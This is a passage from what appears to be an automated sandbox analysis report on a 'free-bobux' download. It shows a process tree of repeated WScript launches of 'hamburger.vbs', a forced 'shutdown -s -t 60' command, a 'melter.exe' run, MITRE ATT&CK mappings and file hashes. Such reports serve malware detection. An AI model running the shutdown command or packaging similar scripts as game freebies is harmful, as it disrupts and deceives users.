  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:6104
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:5900
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:5904
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:4564
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:4492
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:2264
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:4328
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:4752
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:4344
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:2992
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:5564
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:684
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:244
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:4768
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:3236
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:2316
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:3572
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:936
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:1880
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:2496
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:864
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:4836
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:4196
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:5552
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:5424
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:4612
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:1920
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:6160
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:6188
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:6208
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:6224
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:6260
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:6280
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:6308
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:6340
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:6384
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:6412
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:6440
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:6468
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:6488
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:6516
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:6544
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:6568
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:6584
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:6608
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:6640
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:6664
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:6720
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:6760
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:6784
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:6808
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:6832
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:6864
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:6876
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:6932
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:6960
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:6988
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7016
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7044
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7064
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7100
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7128
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7144
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7164
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7196
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7232
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7260
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7288
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7316
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7324
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7372
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7384
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7400
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7428
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7484
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7512
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7532
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7560
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7584
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7604
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7636
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7680
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7708
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7716
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7740
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7748
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7832
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7868
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7896
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7912
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7944
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:7972
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:8000
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:8016
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:8064
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:8092
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:8120
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:8148
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:8168
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:3028
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:8212
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:8240
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:8268
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:8284
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:8324
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:8352
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:8368
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:8416

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\shutdown.vbs"
1⤵
- Checks computer location settings
PID:8832
- C:\Windows\System32\shutdown.exe
  "C:\Windows\System32\shutdown.exe" -s -t 60
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:8908

C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\melter.exe
"C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\melter.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:2916

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
650ae4c6e5b5404a53b370cd6bd849db

SHA1
736ffe69cd7371ce85995350dafd84887898f80c

SHA256
ac6cc8838eb6d34e8152185374b783b09595a72cf846972e6ede98382ce9c895

SHA512
74d34e7c300253b1cda17776dbcc2f31911fcba39df248009992f6c2b3ee190c1eabc776955c93be14574f5e5b8cd5e8e38d9a83c87d83c77ce619fc67fe4bad

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000007

Filesize
32KB

MD5
26d51f80be8b4eba2f2bfd0bf12fd8e1

SHA1
34b25b9da6aa0418b734dfc3ac5303d31bfbb37f

SHA256
a962b42006d54887e66690312ab151780b57640a341e70e3374990d2e96e4a46

SHA512
5b6e3f1a5336bdc3ba4c2793c046c2bcd3a3adddb30c3587dd2ab544ea5e5836df780c3c1ab2c9b2670f1eaba6bf7f619dd646f5b8d58551a48f7f79d2c22c34

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000008

Filesize
32KB

MD5
bdcf1dd416d169d87ad5f73b2fb38bb2

SHA1
f6f595a5d88f84b54533e34be969f3871ed9942f

SHA256
ee2264f45d3d0fc70f89a61c215d0470df5a9c39e47828db7e48c59fca9a50dd

SHA512
335a8b789c5dd06285df135e9e33cbaae0b20b3cda378fd2e92b33a66d7726e4e079f7920055121d2495d102e993e18d9a4430a36860d8cef5cfa100452186fc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000a

Filesize
20KB

MD5
3e14359b0f05e10904b2bde617bbb846

SHA1
ad1b1fe9ff4da2bd179a6a2fa61abece0fa8a2bf

SHA256
c41b8a2d243501cf0d2da34e5104d559aae31bb17ad6dab8d464b99a7cd5fce9

SHA512
ce70c2c307918f49834ef12e032717b9fd6f75418565e4ddeccba123492ac4af4b84e75add201ceba9f78ee1d53648f7ef7a62e5e4738b0a8da2b4c51a8f4d55

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
768B

MD5
9d5cd63c0a86b5e675c232cece235a1d

SHA1
6ba28fdf5c60c958300bdb1b14bd40747456b889

SHA256
20129b793fee2de29bc411a53bcbe6312cf046fadf88d9d42dc27618aa0b1f26

SHA512
8dac91ab82f6a9167a3a601842045847d3d17890a7ad7235742a07d9a8da635794bf7a4673b4965cdca2cddebad42bc85e347bc66ca8a6f895f0ea0d010b648a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
6KB

MD5
f1ddfaec4a548ef9cb3767ee70ad8e2a

SHA1
2048c277d262d8cb0ff535cdc07ac1f1772fbce3

SHA256
14a48d488597dda4a1d5efd6dab71cae8282cdbdf2c54d87e0e12cf88f136031

SHA512
667908498c9d2bfd94d82af3d7261919344c6553c6b063a8809a9c81942d26d0c53e90966bfa2f2b321cad38aa3921680e9b9dcddb84f344023b55025d5c0f74

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
949c6960d7490f51ea7ec6e057900dfd

SHA1
7edbf28358d4c31e11c8c3a18b6600d735f5fe31

SHA256
b4bac7811dc376786b662e3b5083b8606846a809497428c8ed6ca92b5e5b34d2

SHA512
b36c95d2ea0e13453f7b4081268dda3d848f19464a94988c5642cf158d5224b7f04799614c768420c485662317c3262fb04c6b20952c765e82993c16aaad472a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
855B

MD5
6b75cb0774ae33193096b3fed0ec046e

SHA1
e9b711006e510a94ba05d14b9d459614c7c2faed

SHA256
4074d88c982b4ad68f6487427a067b9afb57132a7e769635e87d6ed54893aad2

SHA512
771ed8e74707813f3c61b78607c0c0ffaa310e8bcacae7bf2478738a13198946a23ebd0ce06503898421acff351695be347ac242723b4f285b89fad8383eaac3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
855B

MD5
0bf159d85cd6bff578358c28d2829e34

SHA1
fc0f44dd068702529fb19502b5680a809f877c45

SHA256
ab20f52592560f9b9987a03fcb995b157bdc0e25125a34947ce8828107c4491c

SHA512
918f111086d3f8ad36ee0bb0e505e17f90b49ab1d64864198f2aa13a0603be8476b17e51d97b2fe00da6044dd69839828c36e3d55feb4ba9fca0fea3be455c8d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
e553a0298798a4f6e9c58234901476f8

